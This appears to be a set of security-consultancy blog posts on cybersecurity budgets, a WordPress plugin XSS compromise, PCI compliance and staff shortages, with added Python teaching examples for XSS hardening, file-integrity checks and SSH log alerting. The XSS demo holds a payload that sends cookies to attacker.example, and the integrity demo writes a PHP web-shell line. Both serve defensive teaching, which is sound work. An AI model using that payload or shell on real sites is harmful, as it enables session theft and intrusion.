How much should I spend on Cybersecurity?

I want to discuss two articles and then answer the question in the title.

http://www.theguardian.com/small-business-network/2015/mar/24/hackers-cyberwar-businesses-cybercrime

{Hackers are winning the cyberwar and businesses are all too often simply hoping for the best, according to many security experts. }

[image: anonymous green screen, from qz.com]

The cost of cybercrime in the UK is put at £18-27bn … supposedly. The real figure could actually be higher, since many victims do not talk about cybercrime. But if people are not discussing this crime because of embarrassment or other reasons (PR), then how can we tell what is really happening?

What can we actually attribute to real cybercrime?

{He also alleges that some financial institutions have been compromised and have lost millions, but have kept this information under wraps. “In the past 10 years there has been at least one UK-based building society, which no longer exists, which lost about £50m to what was called a ghost transaction.}

There is very little hard data, and some cybercrime is attributed to potential intellectual property (IP) theft.

The biggest threat is from organised gangs looking to steal data and IP from companies, which they can then exploit on the black market. The hackers are typically based overseas where authorities are less effective at preventing them.

Then I am revisiting my old post: http://oversitesentry.com/the-psychology-of-security/

Humanity is risk averse when it comes to gains and risk seeking when it comes to losses.

“Security is a tradeoff,” Schneier said, speaking to a packed audience at his RSA session. “What are you getting for what you’re giving up? Whether you make that tradeoff consciously or not, there is one.”


This is a very important concept to understand:

Humanity is risk averse when it comes to gains: given a choice between higher risk with higher gains and lower risk with lower gains, the masses as a whole move to the lower-risk choice.

Humanity is risk seeking when it comes to losses (even to the point that most people do not wear bulletproof vests, including police officers). This means that when one has a choice between spending money to potentially lose a little and spending less money to potentially lose more, we will choose the second one more often.

So coming back to the question:   How much should we spend on cybersecurity?

I can’t really say “we” now, because as a cyber security professional I will spend more on it than you will, since I can’t get hacked, period. I will spend whatever time and resources are necessary so that my computers and websites are not hacked.

You or your peers do not fear or understand the true nature of the cyber challenges that we have. So my question is this:

How much should a non-IT pro spend on cybersecurity?


For me to answer this correctly, I want to go back to the regular world and spend a little time on how much we spend on physical security. For one, we spend a certain dollar amount on our physical locks and key systems. For computer rooms we spend money on keycards and on security people watching cameras. So evidently a camera and the labor of a security guard are considered reasonable even in areas where there is little if any crime.

Why hire security people and buy security cameras, biometric devices, etc.? Will they truly be used once or twice to catch an actual criminal? Or are they part of the feeling of security that one wants for the computer systems in a computer room?

[image: biometric device, from bioenabletech.com]

[image: biometric device, from biometricdevices.blogspot.com]

Biometric devices cost from $100 to $2,000, and they have to be integrated with a security system (a hardware/software combination), so the cost will likely rise to several thousand dollars, up to $10,000, with installation and training. Yet the reality is that an actual criminal will likely not attempt a physical attack on a computer room.

So should we make a comparison of potential security risks?

How accurate will the cybersecurity risk assessment be? On top of all of this, the only real statistic is whether one gets breached or not.

Part of the reason everyone is getting hacked is that no one sees anybody actually get breached, except in the well-publicized attacks. So no matter what I conjecture here, your perception is what matters.

And now we get back to the psychology of humanity: risk seeking when it comes to losses. So the reality is that you will discount the scares and potential security problems and take a chance, even if doing nothing carries the higher risk.

Now we know why most businesses will get hacked, period. You have to go against the psychological grain to spend more money on security.

Contact us to help you decide.


Value of a Hacked Website

http://blog.sucuri.net/   has an interesting post about “The Impacts of a Hacked Website”

This is a good line:


We are learning the hard way, what large organizations already learned – being online is a responsibility and will eventually cost you something.

I now know that it was the Yoast Google Analytics plug-in that caused this website to get hacked (http://oversitesentry.com/after-action-report-on-my-hacked-wordpress-fixvirus-com/). I had installed the Yoast plug-in, and then a little black box was suddenly on my site.

[image: close-up of the hacked site]

After installing Yoast I did not realize it had a weakness:

http://seclists.org/fulldisclosure/2015/Mar/136   Apparently there was a security vulnerability:

{ A security vulnerability in the plug-in allows an unauthenticated attacker to store arbitrary HTML, including JavaScript, in the WordPress administrator’s Dashboard on the target system. }
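The quoted weakness is a stored cross-site scripting (XSS) bug: an endpoint that anyone can call saves attacker-controlled text, and the admin dashboard later prints it without encoding. The following Python simulation is an added example, not code from this site or from the Yoast plugin; the function names, the setting name and the tracking-ID format it validates are assumptions for illustration. It places the vulnerable source/sink pair next to a hardened version that requires the admin capability, validates the input against the expected shape, and escapes on output.

```python
import html
import re

# Constructed stand-in for the plugin's settings store (in WordPress this
# would be the options table). Assumption for the demo, not the plugin's code.
SETTINGS = {}

# Constructed attacker input: the kind of payload a stored-XSS bug lets an
# unauthenticated visitor park in a setting that the admin page later prints.
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"

# Assumed format of the legitimate value (a Google Analytics property ID).
TRACKING_ID_RE = re.compile(r"^UA-\d{4,10}-\d{1,4}$")


def store_setting_vulnerable(value: str) -> None:
    """Vulnerable source: saves whatever the request carried, from anyone,
    with no capability check, no nonce and no validation."""
    SETTINGS["tracking_id"] = value


def render_dashboard_vulnerable() -> str:
    """Vulnerable sink: the stored value is inlined into admin HTML as-is,
    so a script tag in it runs in the administrator's browser."""
    return '<div class="notice">Tracking ID: %s</div>' % SETTINGS.get("tracking_id", "")


def store_setting_hardened(value: str, is_admin: bool) -> bool:
    """Hardened source: only an administrator may write the setting, and the
    value must look like a tracking ID. Returns True when stored."""
    if not is_admin or not TRACKING_ID_RE.match(value):
        return False
    SETTINGS["tracking_id"] = value
    return True


def render_dashboard_hardened() -> str:
    """Hardened sink: contextual output encoding for an HTML text node, so the
    value is displayed to the admin instead of executed. This holds even if a
    bad value reached the store some other way."""
    safe = html.escape(SETTINGS.get("tracking_id", ""), quote=True)
    return '<div class="notice">Tracking ID: %s</div>' % safe


def demo() -> dict:
    """Run the attack against both versions and return what each one produced."""
    SETTINGS.clear()
    store_setting_vulnerable(PAYLOAD)
    unsafe_html = render_dashboard_vulnerable()

    SETTINGS.clear()
    stored_as_visitor = store_setting_hardened(PAYLOAD, is_admin=False)  # rejected: no capability
    stored_as_admin = store_setting_hardened(PAYLOAD, is_admin=True)     # rejected: fails validation
    stored_legit = store_setting_hardened("UA-12345-1", is_admin=True)   # accepted

    SETTINGS["tracking_id"] = PAYLOAD  # assume the store was tampered with anyway
    safe_html = render_dashboard_hardened()
    return {
        "unsafe_html": unsafe_html,
        "safe_html": safe_html,
        "stored_as_visitor": stored_as_visitor,
        "stored_as_admin": stored_as_admin,
        "stored_legit": stored_legit,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The two fixes are independent on purpose: the capability check and input validation stop the value from being stored by a visitor, and output encoding stops it from executing even when the first line of defense is bypassed. In a real WordPress plugin the same roles are played by `current_user_can()`, a nonce check, and `esc_html()` at the point of output.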

That is just the beginning of this analysis:

A hacked site can cause problems for you

1. To me the biggest problem is that Google will blacklist your site, and you will not get any traffic.

I ran into that myself and was able to solve it very quickly; Google does fix the listing when you clean the malware.

2. It can happen even to sites that have “nothing important” on them.

3. Brand reputation is a tough nut to get back.

4. Hacks cost more than money (and may also cost some money): the mental cost of having to fix the site, or just of the fact that it was hacked.

For me the only problem was that I had to move hosting companies, which was going to be a lot of work that I had been putting off.

If you have not gotten the message yet I am honest to a fault. I will tell you everything I know and then some stuff you might not want to hear.

In security that is the most important  aspect.

In WordPress I have learned to use the Sucuri WordPress plugin plus a backup plugin. Now that I am on a hosting company with cPanel, I can control the site very well. With the Sucuri plugin, any time a change occurs on the site an email is sent to me. So that is like change control.

PCI Compliance is not Computer Security

PCI compliance covers the basic settings for computer security, but it will not ensure that your corporation is secure.

For that to happen you must have personnel who implement security policies correctly, and security must be ingrained in all employees, as the weakest link is in employee actions day after day. It is difficult to make no mistakes day after day.

So we use technology to help us implement computer security.

We can use an IDS (Intrusion Detection System) or an IPS (Intrusion Prevention System) in the network architecture, plus anti-virus software on the desktop, to set up a layered defense of the networked computers.

[image: PCI DSS requirement 11.3]

Section 11.3 of the PCI DSS standard is the penetration testing requirement for PCI compliance.

Why is pentesting a requirement? Because no matter what you think you have in place, it is always good for someone to try to break in, which gives an added level of assurance. The idea is that any misconfigured systems or other mistakes will be caught by the pentesters, and then those misconfigurations can be fixed.

The best practices section:

[image: PCI DSS best practices section]

Even with all of those items in place, a good training program to keep your employees from being socially engineered is important.

Social engineering is the #1 way an attacker gets a beachhead in the initial attack. From that initial compromise the hacker will slowly try to leverage their access into more access, until they find a system with some worthwhile information.

As I mentioned in this post:

http://oversitesentry.com/why-risk-management-model-failed-us/

What we need to teach employees is that any mistake can start the slow creep, and eventual avalanche, of security problems.

Everyone who clicks on websites and emails is a potential risk. So even with PCI compliance, your company data and customer data are still at risk.

[image: failed risk management model]

There are gaps in our standardized security thinking:

1. Taking care of only the network and desktops will not completely secure the environment.

2. All employees must be made aware of social engineering.

3. The IT knowledge of all employees must be increased.

4. Home VPN connections into the corporate environment can also cause security problems.

5. Any vendor with access to your network could be a security liability.


It goes without saying that any potential problem can bloom into a full-fledged disaster within a few days to weeks.

Why Risk Management Model Failed Us

[image: failed risk management model]

Why has risk management failed us?

Every place you see “Accept risks”, replace it with “Hacked computers”. JP Morgan proved this concept: even with a seemingly unlimited security and IT budget, some mistakes creep into the organization.

76 million households (and 7 million small businesses) affected

Every box that says “monitor and manage risks”, replace with “computer hacked from the internal network”.

Here is the relevant sentence from the Wall Street Journal article:

{Hackers appear to have originally breached J.P. Morgan’s network via an employee’s personal computer, a person close to the investigation has said. From there, the intruders were able to move further into the bank’s systems. Employees often use software to tap into corporate networks from home through what are known as virtual private networks.}

I wonder whether your “extensive management crucial” box can defend against an infected or hacked computer on the internal network.

We must ASSUME the hacker is in the network already.

In theory we protect the highest-risk and highest-impact computers, but they are not necessarily protected from the inside and from all threats.

Why else have there been so many hacked networks? Because not all the computers are protected as they should be, and inevitably somewhere someone makes a mistake, and then the hacker is in.

Once the hacker is in your network, the reported figure is that it takes around 220 days on average to find the breach. In seven months a hacker can compromise the rest of the machines.

We must move to a different risk management model:

[image: systems engineering process]

One where we replace the “Model the system” step with “All the computers, one at a time, no matter what”.

[image: risk management systems process]

It is much simpler than the complex risk management process, and it is time for us to institute a simpler process, one that invites fewer errors and is easier to manage all around.

We can also insert steps such as “test the machine with a Nessus or Qualys vulnerability scan every time a change is made” in the “re-evaluate” box.
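Both the Sucuri change emails from the earlier post and the “re-evaluate after every change” step here depend on the same thing: noticing that something on the host changed. The following Python script is an added example, not the page’s code and not Sucuri’s, of the underlying technique: take a SHA-256 baseline of a web root, compare a later snapshot against it, and raise a rescan/review flag on any added, removed or modified file. The directory layout, the skipped cache directory and the file contents are constructed for the demo; the baseline would normally be written to disk somewhere the web server cannot modify.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file so large uploads do not have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path, skip_dirs=("wp-content/cache",)) -> dict:
    """Map of relative path -> SHA-256 for every regular file under root.
    skip_dirs (an assumed name for a plugin cache) lists directories that
    change legitimately all the time and would only produce noise."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root).as_posix()
        for d in list(dirnames):
            rel = d if rel_dir == "." else f"{rel_dir}/{d}"
            if rel in skip_dirs:
                dirnames.remove(d)  # prune before os.walk descends
        for name in filenames:
            p = Path(dirpath) / name
            baseline[p.relative_to(root).as_posix()] = sha256_file(p)
    return baseline


def diff_baseline(old: dict, new: dict) -> dict:
    """Classify every difference between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def needs_rescan(delta: dict) -> bool:
    """The 're-evaluate' trigger: any change means the host should be
    vulnerability-scanned again and a person should read the diff."""
    return any(delta[k] for k in ("added", "removed", "modified"))


def demo() -> dict:
    """Constructed web root: baseline it, then simulate an attacker editing
    one file, dropping a web shell and deleting a file, while the cache
    directory churns as usual."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content" / "plugins").mkdir(parents=True)
        (root / "wp-content" / "cache").mkdir()
        (root / "index.php").write_text("<?php // original\n")
        (root / "wp-content" / "plugins" / "ga.php").write_text("<?php // plugin\n")
        (root / "wp-content" / "cache" / "tmp.txt").write_text("noise\n")
        (root / "readme.html").write_text("<html></html>\n")
        before = build_baseline(root)

        (root / "index.php").write_text("<?php // original\n<?php eval($_POST['x']); ?>\n")
        (root / "wp-content" / "plugins" / "c99.php").write_text("<?php // shell\n")
        (root / "readme.html").unlink()
        (root / "wp-content" / "cache" / "tmp.txt").write_text("different noise\n")
        after = build_baseline(root)

        delta = diff_baseline(before, after)
        delta["rescan"] = needs_rescan(delta)
        return delta


if __name__ == "__main__":
    print(demo())
```

Run from cron, the `delta` is what goes into the change-control email, and a true `rescan` flag is what kicks off the Nessus or Qualys scan in the re-evaluate step. The cache directory is excluded deliberately: an integrity monitor that alerts on every legitimate change trains people to ignore it.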


 Contact Us to discuss how we can help.


#Cybersecurity hiring problems?

How can we most efficiently solve the labor shortage in cybersecurity? We can’t hire robots (like the Lely Vector) the way dairy farms do:

[image: Lely Vector dairy robot]

There, automation replaced jobs that were going unfilled, jobs that had been mostly (80%) immigrant labor.

Don’t get me wrong, we should automate as much as possible, since that will help with our IT security positions. Definitely use scripting and automated techniques in vulnerability scanning. But at some point the logs need to be checked, or an email sent, to investigate a potential problem (missed alerts may have been what did the Target breach in).

At some point a human has to receive the alert or review the log that was automatically generated.
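As an added example of the “automate, then hand the alert to a human” point, and not code from the page or from any vendor, here is a Python detector run over a few constructed sshd log lines (the host, users and addresses are invented; the addresses come from the documentation ranges). It raises a brute-force alert when one source fails five times within five minutes, and a higher-priority alert when that same source later logs in successfully, which is the event a person must investigate first.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, not real logs: lines in the /var/log/auth.log format.
SAMPLE_LOG = """\
Mar 24 10:01:02 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51000 ssh2
Mar 24 10:01:05 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 51001 ssh2
Mar 24 10:01:09 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51002 ssh2
Mar 24 10:01:12 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51003 ssh2
Mar 24 10:01:15 web1 sshd[2101]: Failed password for root from 203.0.113.7 port 51004 ssh2
Mar 24 10:01:40 web1 sshd[2102]: Accepted password for root from 203.0.113.7 port 51005 ssh2
Mar 24 10:15:00 web1 sshd[2200]: Failed password for bob from 198.51.100.4 port 40000 ssh2
Mar 24 10:15:30 web1 sshd[2201]: Accepted publickey for bob from 198.51.100.4 port 40001 ssh2
Mar 24 11:30:00 web1 sshd[2300]: Failed password for alice from 192.0.2.9 port 33000 ssh2
Mar 24 11:45:00 web1 sshd[2301]: Failed password for alice from 192.0.2.9 port 33001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse(log_text: str, year: int = 2015) -> list:
    """Turn syslog lines into (timestamp, result, user, ip) tuples.
    syslog omits the year, so the caller supplies it."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd chatter, not an auth result
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect(events: list, threshold: int = 5, window: timedelta = timedelta(minutes=5)) -> list:
    """Rule 1: threshold failures from one source inside the window -> brute_force.
    Rule 2: a success from a source already flagged by rule 1 -> success_after_failures.
    Two isolated failures an hour apart (alice below) never reach the threshold."""
    alerts = []
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    flagged = set()
    for ts, result, user, ip in sorted(events):
        if result == "Failed":
            recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
            if len(recent[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"rule": "brute_force", "ip": ip, "count": len(recent[ip]), "at": ts})
        elif ip in flagged:
            alerts.append({"rule": "success_after_failures", "ip": ip, "user": user, "at": ts})
    return alerts


def review_queue(alerts: list) -> list:
    """What the automation hands to a person: one line per alert, worst first.
    This is the body of the email the text says someone has to read."""
    order = {"success_after_failures": 0, "brute_force": 1}
    lines = []
    for a in sorted(alerts, key=lambda a: (order[a["rule"]], a["at"])):
        if a["rule"] == "brute_force":
            lines.append(f"{a['at']:%b %d %H:%M:%S} {a['ip']}: {a['count']} failed logins in window, check source")
        else:
            lines.append(f"{a['at']:%b %d %H:%M:%S} {a['ip']}: login as {a['user']} succeeded after brute force, INVESTIGATE NOW")
    return lines


if __name__ == "__main__":
    for line in review_queue(detect(parse(SAMPLE_LOG))):
        print(line)
```

The ordering in `review_queue` is the point: the automation can count failures all day, but deciding whether the root login from the brute-forcing address was an administrator who mistyped a password or an intruder is exactly the judgment that still needs a human.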

There are many articles out that discuss the IT security labor shortage.

Networkworld.com has the story:

http://www.networkworld.com/article/2893653/cisco-subnet/endpoint-security-meets-the-cybersecurity-skills-shortage.html

This story discusses one aspect of IT security, the endpoint labor shortage, and the issue is not even the high-risk incidents but the following:

When asked to identify their top endpoint security challenges, 38% of enterprise security professionals stated that their organization’s endpoint security staff spends too much time attending to high-priority issues and not enough time on process improvement and strategic planning.

So even in environments focused on critical fixes, many organizations are not performing the process improvements needed to handle new attacks.

On Friday our blog post attempted to start a conversation: http://oversitesentry.com/improve-cybersecurity-lets-teach-more-infosec/

The endpoint is only one aspect of IT security though. In an enterprise environment there are multiple departments that require years of experience:

  1. Firewall operations and network security (including ACLs, Access Control Lists)
  2. Endpoint security software operations (the infrastructure for endpoint security has its own challenges)
  3. Forensics (after a loss or breach someone has to review and clean the endpoint)
  4. Vulnerability scanning (scan the network to see what the computers are doing)
  5. Web application scanning (web applications must be scanned)
  6. Penetration testing (some pentests must be performed for applications)
  7. Security operations (must have infrastructure support for whichever vendor’s IDS/IPS systems are in use)
  8. Threat intel (this department looks at specific threats coming into the organization)
  9. IT security management (directors, executives and managers)

So the way to fix our labor shortage is to get everyone in IT up to speed: train our current IT staff and hire more IT staff in general.

If specialists in network security or operations are needed, then those need to be hired specifically for certain slots.

But what the article is talking about is the major labor shortage in endpoint security; without the staff, we get messages like the following:

[image: CryptoWall 2.0 ransom message]

This is a CryptoWall 2.0 message (from last year, 2014); unfortunately CryptoWall has since evolved into a more dangerous version.

On Feb 26 the blog post discussed the difficulties in an enterprise environment: http://oversitesentry.com/how-do-we-improve-security/

[image: Windows XP update, 2006]

CryptoWall 3.0 has returned with a streamlined dropper:

http://www.v3.co.uk/v3-uk/news/2394598/cryptowall-30-ransomware-returns-with-streamlined-dropper

Cisco’s Talos group discussed the details of CryptoWall 3.0: http://blogs.cisco.com/security/talos/cryptowall-3-0

How can we teach more IT security people to understand the methods and how to prevent CryptoWall 3.0?

We have to teach the security basics so that the details can be understood. Most of all, we must learn to do the right thing:

Filotimo (Greek ΦΙΛΟΤΙΜΟ, roughly “friend of honor”), YouTube video:

http://youtu.be/DaPF4_-gH4g

Contact us for help with your IT security career direction:

http://oversitesentry.com/mentoring-future-it-cybersecurity-ethical-hackers/